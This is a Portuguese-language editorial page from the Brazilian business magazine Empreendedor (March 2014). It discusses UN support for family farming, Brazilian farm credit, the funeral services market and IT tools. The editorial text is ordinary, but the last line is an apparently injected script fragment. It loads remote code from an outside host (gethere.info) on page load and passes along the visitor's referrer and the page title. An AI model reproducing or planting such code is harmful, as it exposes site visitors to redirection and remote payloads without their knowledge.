Última edição Edição 262 January 2017 Assine

Empreendedor 233 – Março de 2014

marco2014

Fartura no campo

No início de março, durante o Fórum Mundial sobre Agricultura Familiar, que aconteceu em Budapeste, o secretário-geral das Nações Unidas, Ban Ki-moon, solicitou aos governos que aumentem o apoio à agricultura familiar em defesa do desenvolvimento rural e do combate à fome.

Ao discursar no fórum, o diretor-geral da Organização para a Agricultura e Alimentação (FAO), José Graziano da Silva, reiterou as palavras de Ban Ki-moon e adiantou que um estudo recente em 93 países mostra que a agricultura familiar representa mais de 90% do total das explorações agrícolas. “Além de produzirem uma grande parte dos alimentos que comemos, os agricultores familiares são, de longe, a maior fonte de emprego no mundo”, afirmou José Graziano da Silva, conforme informações divulgadas pela Agência Brasil. No Brasil, os pequenos produtores representam 33% do PIB agropecuário e são responsáveis por 84% dos estabelecimentos rurais e 74% da mão de obra no campo.

Ban Ki-moon defendeu ajuda aos agricultores familiares, especialmente às mulheres e aos jovens, por meio de políticas que propiciem um desenvolvimento rural equitativo e sustentável. Para a safra atual brasileira (2013/2014), o governo federal disponibilizou R$ 21 bilhões para agricultura familiar – valor quase quatro vezes maior do que o disponibilizado há 10 anos. Esses recursos são utilizados para custear atividades, expandir a produção e adquirir máquinas e equipamentos.

São mais tratores, mais caminhões, equipamentos de irrigação e resfriadores de leite, entre outros, aumentando a produtividade nas lavouras e nas criações da agricultura familiar. E, de quebra, movimentando a indústria voltada ao setor.

Nesta edição você também encontra uma reportagem sobre um ramo que é um tabu: o mercado funerário. Mas, na vida, só uma coisa é certa: a morte. O que faz disto também um negócio certo, apesar de a maioria das pessoas evitar pensar nisso. Nos últimos anos, a estabilização das taxas de mortalidade tem obrigado o segmento a ampliar cada vez mais a oferta de serviços. Mais do que crescer, o objetivo é não estagnar e conter um possível desaquecimento causado pelo aumento da expectativa de vida geral da população. Estas e outras questões exigem do mercado atendimento personalizado e serviços inovadores para atender novos interesses.

E falando em inovação, diante do mundo de rápidas mudanças e acúmulo de informações, a simplicidade é o melhor caminho. Empresas de TI, como a SAP, oferecem diversas tecnologias que ajudam a evitar falhas e a explorar os negócios com mais eficiência e resultado. Hoje já estão disponíveis para empresas de todos os tamanhos soluções de computação em nuvem e de Big Data, entre outras.

Assina a revista

s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;